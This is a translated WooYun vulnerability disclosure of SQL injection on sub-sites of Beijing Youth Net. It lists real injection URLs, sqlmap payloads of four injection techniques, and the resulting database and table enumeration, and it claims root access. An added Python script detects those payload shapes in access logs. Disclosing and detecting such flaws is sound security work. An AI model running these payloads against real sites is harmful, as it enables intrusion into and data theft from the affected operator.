
Vulnerability summary

Defect ID: wooyun-2015-0142103

Title: SQL injection at Beijing Youth Net (北青网) and its fallout # different sub-sites, packaged separately

Vendor: 北青网 (Beijing Youth Net)

Author: me1ody

Submitted: 2015-09-19 09:30

Fix deadline: 2015-11-03 09:32

Published: 2015-11-03 09:32

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 7

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-19: actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-11-03: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Affected sub-sites include: news, current affairs, entertainment, sports, news specials, Olympics, society, law, focus, commentary, in-depth, online commentary, global, forum, pictures, spotlight, oddities, true stories, and others.
1. Data leakage of every kind (different sub-sites expose different data)
2. ROOT privileges (usable for further penetration and privilege escalation; you can imagine how much damage is possible; 655 sites on the same server)
3. World rank: 4,757; traffic rank: 6689; daily IPs ≈ 186,000; daily PVs ≈ 892,800 (black-market folks, I'm here to put an end to your schemes -_-. Sorry!)

Detailed description:

Injection points:

http://auto.ynet.com/cgi/newslist.php?dir=101
http://auto.ynet.com/cgi/news.php?id=532927
http://auto.ynet.com/cgi/subbrand.php?subid=44
http://auto.ynet.com/cgi/configuration.php?subid=44


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=532927 AND 8026=8026
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=532927 AND (SELECT 4037 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(4037=4037,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=532927 AND (SELECT * FROM (SELECT(SLEEP(10)))UmVb)
Type: UNION query
Title: MySQL UNION query (22) - 28 columns
Payload: id=-8847 UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7171787671,0x4665435848565a785572,0x7176767871),11,11,11,11,11,11,11,11,11,11,11#
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
available databases [3]:
[*] foodbq
[*] information_schema
[*] web_2_1
current database: 'web_2_1'
Database: web_2_1
[40 tables]
+-----------------+
| global |
| user |
| article_from |
| auto_ad |
| auto_bang |
| auto_beauty |
| auto_big_brands |
| auto_bqyc |
| auto_brands |
| auto_cars |
| auto_comment |
| auto_index |
| auto_photo |
| auto_subbrands |
| auto_zhuanti |
| baojia_4s |
| beauty_album |
| beauty_index |
| blank_data |
| complain |
| dealers |
| fenlei |
| fenlei_beauty |
| friend_links |
| index_car2013 |
| market_cars |
| navcode |
| navigation |
| news |
| news_top |
| polymorphic |
| sp_t28 |
| sp_t32 |
| sp_t33 |
| sp_t34 |
| sp_t35 |
| sp_t36 |
| temp |
| tempdef |
| tuijian_top |
+-----------------+
Database: web_2_1
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| auto_cars | 13346 |
| news | 9507 |
| auto_photo | 6252 |
| auto_subbrands | 1522 |
| sp_t36 | 904 |
| tempdef | 711 |
| `user` | 446 |
| auto_beauty | 354 |
| auto_brands | 205 |
| auto_comment | 150 |
| auto_big_brands | 138 |
| beauty_album | 55 |
| baojia_4s | 37 |
| temp | 34 |
| fenlei | 33 |
| dealers | 28 |
| friend_links | 23 |
| complain | 20 |
| sp_t32 | 16 |
| market_cars | 14 |
| tuijian_top | 13 |
| auto_ad | 9 |
| auto_zhuanti | 9 |
| sp_t33 | 8 |
| news_top | 5 |
| sp_t28 | 5 |
| fenlei_beauty | 4 |
| navcode | 3 |
| `global` | 2 |
| article_from | 1 |
| auto_bang | 1 |
| auto_bqyc | 1 |
| auto_index | 1 |
| beauty_index | 1 |
| blank_data | 1 |
| index_car2013 | 1 |
| polymorphic | 1 |
| sp_t34 | 1 |
| sp_t35 | 1 |
+-----------------+---------+
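The sqlmap output above reports four injection techniques against the `id` parameter of `news.php` (boolean-based, error-based, time-based and UNION). As an added example that is not part of the original report, the following detection script matches the shape of each of those payloads in web-server access logs so that such probing can be spotted by the site operator; the log lines are constructed samples, and the signatures are illustrative rather than exhaustive.

```python
import re
from urllib.parse import unquote_plus

# One signature per technique sqlmap reported against news.php?id= above:
# boolean-based, error-based (the FLOOR(RAND(0)*2) duplicate-key trick),
# time-based (SLEEP) and UNION. Illustrative, not exhaustive.
SIGNATURES = {
    "boolean-based": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# Apache combined-log shape: ip ident user [time] "method path proto" status size
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify(path):
    """Return the techniques whose signature matches the URL-decoded query string."""
    decoded = unquote_plus(path.partition("?")[2])
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(lines):
    """Return (ip, path, techniques) for every parseable line that trips a signature."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log shape
        techniques = classify(m.group("path"))
        if techniques:
            hits.append((m.group("ip"), m.group("path"), techniques))
    return hits


# Constructed sample lines (not real traffic); the injected values follow the
# payload shapes in the sqlmap output above, URL-encoded as a client would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Sep/2015:09:30:01 +0800] "GET /cgi/news.php?id=532927 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/Sep/2015:09:30:02 +0800] "GET /cgi/news.php?id=532927%20AND%208026%3D8026 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/Sep/2015:09:30:03 +0800] "GET /cgi/news.php?id=532927%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 312',
    '203.0.113.5 - - [19/Sep/2015:09:30:04 +0800] "GET /cgi/news.php?id=532927%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))UmVb) HTTP/1.1" 200 5120',
    '203.0.113.5 - - [19/Sep/2015:09:30:15 +0800] "GET /cgi/news.php?id=-8847%20UNION%20ALL%20SELECT%2011,11,11%23 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, path, techniques in scan(SAMPLE_LOG):
        print(ip, ",".join(techniques), path)
```

A time-based probe is only visible in the log by its payload, so correlating these hits with slow response times for the same `id` values is a useful second signal.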

Proof of vulnerability:

Same as above

Fix recommendation:

- -

Copyright notice: please credit the source when reposting: me1ody@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined the report